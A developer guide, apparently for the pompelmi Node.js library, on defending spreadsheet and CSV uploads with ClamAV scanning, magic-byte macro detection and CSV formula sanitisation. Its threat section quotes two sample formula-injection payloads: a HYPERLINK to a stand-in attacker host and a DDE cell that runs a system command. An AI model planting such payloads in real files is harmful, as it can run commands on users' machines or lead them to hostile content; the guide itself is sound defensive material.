Scanning Excel and CSV files for malicious macros
Spreadsheet files are a common malware delivery vector. If your application
accepts uploads of .xls, .xlsx, .xlsm,
.xlsb, or .csv files from untrusted users, you face
several distinct threats:
- VBA macros. Legacy .xls files and macro-enabled .xlsm/.xlsb files can contain Visual Basic for Applications code that executes on the victim's machine when the file is opened and macros are allowed to run. Many ransomware and trojan campaigns are delivered via malicious Excel macros.
- DDE (Dynamic Data Exchange) injection in CSV. A CSV cell that starts with =, +, -, or @ can be interpreted as a formula by spreadsheet applications. A cell like =HYPERLINK("http://evil.example/payload","Click here") plants a link to attacker-controlled content, and a DDE payload like =cmd|' /c calc'!A0 can run a system command when the file is opened.
- Embedded objects and OLE streams. Office documents can embed other objects (executables, scripts, or other Office files) inside OLE compound document streams.
What ClamAV detects
ClamAV has extensive coverage of Office malware. It scans OLE2 compound
documents (the binary .xls format) and OOXML archives (the
ZIP-based .xlsx / .xlsm format), looking for:
- Known VBA macro malware signatures (thousands of entries)
- Heuristic patterns in macro code (obfuscated Shell, WScript, PowerShell calls)
- Malicious embedded objects and shellcode
- Suspicious URL patterns in embedded hyperlinks
When ClamAV finds a macro threat it returns exit code 1, which pompelmi maps
to Verdict.Malicious. For unknown or novel macro payloads it may
return Verdict.Clean: ClamAV is signature-based and cannot
detect every possible obfuscated macro, so a clean verdict means that no known
signature matched, not that the file is safe.
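Because ClamAV is signature-based, it can help to make the handling of each verdict explicit and to fail closed. The sketch below is only an illustration: the `Verdict` object is a local stand-in for the one exported by pompelmi (the real values may differ; only the three names come from this guide), and `actionForVerdict` is a hypothetical helper name.

```javascript
// Stand-in for pompelmi's Verdict export so the sketch runs on its own.
// Assumption: the real values may differ; only the three names come from this guide.
const Verdict = Object.freeze({
  Clean: 'Clean',
  Malicious: 'Malicious',
  ScanError: 'ScanError',
});

// Hypothetical helper: map a scan verdict to an upload decision.
// Fails closed: only an explicit Clean verdict lets the upload continue.
function actionForVerdict(verdict) {
  switch (verdict) {
    case Verdict.Clean:
      // No known signature matched; later checks should still run.
      return { accept: true, reason: 'no known signature matched' };
    case Verdict.Malicious:
      return { accept: false, reason: 'malware detected' };
    case Verdict.ScanError:
      return { accept: false, reason: 'scan incomplete' };
    default:
      return { accept: false, reason: 'unrecognised verdict' };
  }
}
```

Treating an unrecognised value as a rejection means a future change in the scanner's return values cannot silently let files through.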
Detecting macro-enabled formats by magic bytes
The file extension alone cannot be trusted — users can rename files. Check the actual format using magic bytes before deciding whether to accept the file:
| Format | Extension | Magic bytes (hex) | Notes |
|---|---|---|---|
| Binary Excel (OLE2) | .xls | D0 CF 11 E0 | Can contain VBA macros |
| OpenXML (ZIP-based) | .xlsx, .xlsm, .xlsb | 50 4B 03 04 | .xlsm / .xlsb can contain macros |
| CSV (plain text) | .csv | No specific magic; check content type and extension | Subject to DDE injection |
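const fs = require('fs');

// Read the first `length` bytes of a file without loading the whole file
function readMagic(filePath, length = 4) {
  const fd = fs.openSync(filePath, 'r');
  try {
    const buf = Buffer.alloc(length);
    fs.readSync(fd, buf, 0, length, 0);
    return buf;
  } finally {
    // Close the descriptor even if the read throws
    fs.closeSync(fd);
  }
}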
function isMacroEnabled(filePath, originalName) {
  const magic = readMagic(filePath);
  const ext = originalName.split('.').pop()?.toLowerCase();

  // .xls binary format (OLE2): always supports macros
  if (magic[0] === 0xD0 && magic[1] === 0xCF) return true;

  // ZIP-based OOXML: only macro-enabled variants are dangerous
  const isZip = magic[0] === 0x50 && magic[1] === 0x4B;
  return isZip && (ext === 'xlsm' || ext === 'xlsb');
}
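Magic bytes cannot tell .xlsx from .xlsm, since both are ZIP archives. One heuristic, sketched below under stated assumptions, is to look for the `vbaProject.bin` entry name that macro-enabled OOXML workbooks normally carry. ZIP stores entry names uncompressed in its headers, so a plain byte search can find the name without a ZIP library. `containsVbaProject` is a hypothetical helper name; the check reads the whole file into memory and a crafted archive could evade it, so treat it as an extra signal rather than a guarantee.

```javascript
const fs = require('fs');
const os = require('os');
const path = require('path');

// Hypothetical helper: true when a ZIP-based workbook mentions vbaProject.bin
// in its (uncompressed) entry names. Reads the whole file, so apply the
// upload size limit first.
function containsVbaProject(filePath) {
  const data = fs.readFileSync(filePath);
  const isZip = data.length >= 4 &&
    data[0] === 0x50 && data[1] === 0x4B && data[2] === 0x03 && data[3] === 0x04;
  if (!isZip) return false;
  return data.includes(Buffer.from('vbaProject.bin', 'latin1'));
}

// Usage with two synthetic files (not real workbooks, just the byte patterns)
const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'vba-check-'));
const zipMagic = Buffer.from([0x50, 0x4B, 0x03, 0x04]);
const withMacro = path.join(dir, 'renamed.xlsx');
const withoutMacro = path.join(dir, 'plain.xlsx');
fs.writeFileSync(withMacro, Buffer.concat([zipMagic, Buffer.from('xl/vbaProject.bin')]));
fs.writeFileSync(withoutMacro, Buffer.concat([zipMagic, Buffer.from('xl/workbook.xml')]));

const macroResult = containsVbaProject(withMacro);
const plainResult = containsVbaProject(withoutMacro);
fs.rmSync(dir, { recursive: true, force: true });
```

A file that carries the .xlsx extension but matches this check is a reasonable candidate for rejection alongside the extension-based test.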
Sanitising DDE injection in CSV files
CSV files are plain text, and a formula payload looks like any other string, so ClamAV is unlikely to flag DDE injection. You need to sanitise CSV content server-side before storing or processing it.
The standard mitigation is to prefix any cell value that starts with
=, +, -, or @ with a
single quote or tab, preventing spreadsheet applications from interpreting it
as a formula:
const fs = require('fs');

// Sanitise a CSV file in-place: prefix formula triggers with a tab.
// Limitation: this splits on every comma, so it assumes that no field
// contains a quoted comma or an embedded newline.
function sanitiseCsvDde(filePath) {
  const content = fs.readFileSync(filePath, 'utf8');
  const sanitised = content
    .split(/\r?\n/) // also handles Windows (CRLF) line endings
    .map((line) => {
      return line
        .split(',')
        .map((cell) => {
          // Strip surrounding whitespace and one layer of quotes before testing
          const trimmed = cell.trim().replace(/^["']|["']$/g, '');
          if (/^[=+\-@]/.test(trimmed)) {
            // Prefix with tab to neutralise formula interpretation
            return `"\t${trimmed}"`;
          }
          return cell;
        })
        .join(',');
    })
    .join('\n');
  fs.writeFileSync(filePath, sanitised, 'utf8');
}
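Splitting on every comma breaks when a quoted field itself contains a comma or a newline. The following is a minimal sketch of a quote-aware variant that works on a string rather than a file. `sanitiseCsvText` and `encodeField` are hypothetical names, and the parser assumes RFC 4180-style quoting with `"` as the only quote character; a maintained CSV library is likely a better choice in production.

```javascript
// Hypothetical helper: re-encode one decoded field, prefixing a tab when the
// value starts with a formula trigger (=, +, -, @).
function encodeField(value, wasQuoted) {
  const risky = /^[=+\-@]/.test(value.trim());
  const safe = risky ? `\t${value}` : value;
  const needsQuotes = wasQuoted || risky || /[",\r\n]/.test(safe);
  // Double embedded quotes so the output stays valid CSV
  return needsQuotes ? `"${safe.replace(/"/g, '""')}"` : safe;
}

// Hypothetical helper: walk the text once, tracking whether we are inside a
// quoted field, and rewrite each field as it completes.
function sanitiseCsvText(text) {
  let out = '';
  let field = '';
  let inQuotes = false;
  let wasQuoted = false;

  const flush = () => {
    out += encodeField(field, wasQuoted);
    field = '';
    wasQuoted = false;
  };

  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    if (inQuotes) {
      if (ch === '"' && text[i + 1] === '"') {
        field += '"'; // escaped quote inside a quoted field
        i++;
      } else if (ch === '"') {
        inQuotes = false; // closing quote
      } else {
        field += ch; // commas and newlines are literal here
      }
    } else if (ch === '"' && field === '') {
      inQuotes = true;
      wasQuoted = true;
    } else if (ch === ',' || ch === '\n') {
      flush();
      out += ch;
    } else if (ch === '\r' && text[i + 1] === '\n') {
      flush();
      out += '\r\n';
      i++;
    } else {
      field += ch;
    }
  }
  flush();
  return out;
}
```

Like the simpler version, this also prefixes plain negative numbers such as -2, which is the usual trade-off of a prefix-based mitigation.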
Complete upload handler
const express = require('express');
const multer = require('multer');
const { scan, Verdict } = require('pompelmi');
const fs = require('fs');
const os = require('os');

const app = express();
const upload = multer({
  dest: os.tmpdir(),
  limits: { fileSize: 20 * 1024 * 1024 }, // 20 MB
});

const ALLOWED_EXTENSIONS = new Set(['xlsx', 'csv']);

// Read the first four bytes of the uploaded file
function readMagic(filePath) {
  const fd = fs.openSync(filePath, 'r');
  const buf = Buffer.alloc(4);
  fs.readSync(fd, buf, 0, 4, 0);
  fs.closeSync(fd);
  return buf;
}

function isMacroEnabled(filePath, originalName) {
  const magic = readMagic(filePath);
  const ext = originalName.split('.').pop()?.toLowerCase();
  if (magic[0] === 0xD0 && magic[1] === 0xCF) return true; // .xls
  const isZip = magic[0] === 0x50 && magic[1] === 0x4B;
  return isZip && (ext === 'xlsm' || ext === 'xlsb');
}

app.post('/upload/spreadsheet', upload.single('file'), async (req, res) => {
  if (!req.file) return res.status(400).json({ error: 'No file provided.' });

  const tmpPath = req.file.path;
  try {
    const ext = req.file.originalname.split('.').pop()?.toLowerCase();

    // Step 1: extension allowlist
    if (!ALLOWED_EXTENSIONS.has(ext)) {
      return res.status(400).json({ error: `File type .${ext} is not accepted.` });
    }

    // Step 2: reject macro-enabled formats
    if (isMacroEnabled(tmpPath, req.file.originalname)) {
      return res.status(400).json({
        error: 'Macro-enabled spreadsheets (.xls, .xlsm, .xlsb) are not accepted. Please save as .xlsx.',
      });
    }

    // Step 3: ClamAV scan
    const verdict = await scan(tmpPath);
    if (verdict === Verdict.Malicious) {
      return res.status(400).json({ error: 'Malware detected. Upload rejected.' });
    }
    if (verdict === Verdict.ScanError) {
      return res.status(422).json({ error: 'Scan incomplete. Upload rejected.' });
    }

    // Step 4: DDE sanitisation for CSV files
    if (ext === 'csv') {
      sanitiseCsvDde(tmpPath);
    }

    // Step 5: move to permanent storage (not shown here)
    return res.json({ status: 'ok', file: req.file.originalname });
  } finally {
    // Always remove the temporary upload, whatever the outcome
    if (fs.existsSync(tmpPath)) fs.unlinkSync(tmpPath);
  }
});

// Same comma-splitting sanitiser as above: assumes no quoted commas in fields
function sanitiseCsvDde(filePath) {
  const content = fs.readFileSync(filePath, 'utf8');
  const sanitised = content.split(/\r?\n/).map((line) =>
    line.split(',').map((cell) => {
      const trimmed = cell.trim().replace(/^["']|["']$/g, '');
      return /^[=+\-@]/.test(trimmed) ? `"\t${trimmed}"` : cell;
    }).join(',')
  ).join('\n');
  fs.writeFileSync(filePath, sanitised, 'utf8');
}
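Step 5 in the handler is left as a comment. One possible shape for it, sketched here with hypothetical names (`storeUpload` and the destination directory), is to copy the scanned file under a server-generated name so the client-supplied filename never reaches the filesystem. Copying rather than renaming keeps the sketch working when the temp directory and the destination sit on different filesystems, and it leaves the temp file in place for the handler's `finally` block to remove.

```javascript
const crypto = require('crypto');
const fs = require('fs');
const os = require('os');
const path = require('path');

// Hypothetical helper: copy a scanned temp file into destDir under a random
// name. `ext` must already have passed the extension allowlist.
function storeUpload(tmpPath, destDir, ext) {
  fs.mkdirSync(destDir, { recursive: true });
  const storedName = `${crypto.randomUUID()}.${ext}`;
  const destPath = path.join(destDir, storedName);
  // COPYFILE_EXCL fails instead of overwriting if the name somehow exists
  fs.copyFileSync(tmpPath, destPath, fs.constants.COPYFILE_EXCL);
  return destPath;
}

// Usage with a throwaway directory standing in for permanent storage
const workDir = fs.mkdtempSync(path.join(os.tmpdir(), 'store-demo-'));
const tmpFile = path.join(workDir, 'upload.tmp');
fs.writeFileSync(tmpFile, 'a,b\n1,2\n');
const storedPath = storeUpload(tmpFile, path.join(workDir, 'uploads'), 'csv');
const storedContent = fs.readFileSync(storedPath, 'utf8');
fs.rmSync(workDir, { recursive: true, force: true });
```

In the handler this call would sit between the sanitisation step and the JSON response, with the original filename kept only as metadata if it is needed for display.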
Defence in depth
| Layer | What it stops |
|---|---|
| File size limit (Multer) | Oversized uploads, resource exhaustion |
| Extension allowlist | Unexpected file types |
| Magic byte check + macro format rejection | Misnamed VBA-capable files, legacy binary formats |
| pompelmi + ClamAV scan | Known macro malware, embedded executables, trojans |
| CSV DDE sanitisation | Formula injection in plain-text CSV files |
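| Download response headers (Content-Disposition: attachment, X-Content-Type-Options: nosniff, Content-Security-Policy) | Inline rendering and MIME sniffing in the browser when files are served back; these headers do not affect formula evaluation inside a spreadsheet application |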
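For the last layer in the table, the response headers do most of the work when a stored file is served back. A minimal sketch, assuming an Express-style `res.set(headers)` call and a hypothetical `downloadHeaders` helper: it forces a download with a generic content type, disables MIME sniffing, and sends a restrictive Content-Security-Policy. These headers govern how the browser treats the response; they do not change what a spreadsheet application does once the file is opened, which is why the CSV sanitisation step still matters.

```javascript
// Hypothetical helper: headers for serving a stored upload back to a user.
function downloadHeaders(storedName) {
  // Keep only a conservative character set in the filename parameter
  const safeName = storedName.replace(/[^A-Za-z0-9._-]/g, '_');
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "default-src 'none'; sandbox",
  };
}

// Example: spaces and quotes in the name are replaced with underscores
const headers = downloadHeaders('report "q1".csv');
```

In an Express route this would typically be applied with `res.set(downloadHeaders(name))` before streaming the file.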
Next steps
- Worried about ZIP bombs in archive uploads? See Preventing ZIP Bomb attacks in Node.js.
- Dealing with encrypted or password-protected files? See How to handle encrypted/password-protected files during scan.
- Want a complete upload security checklist? Read Node.js file upload security checklist.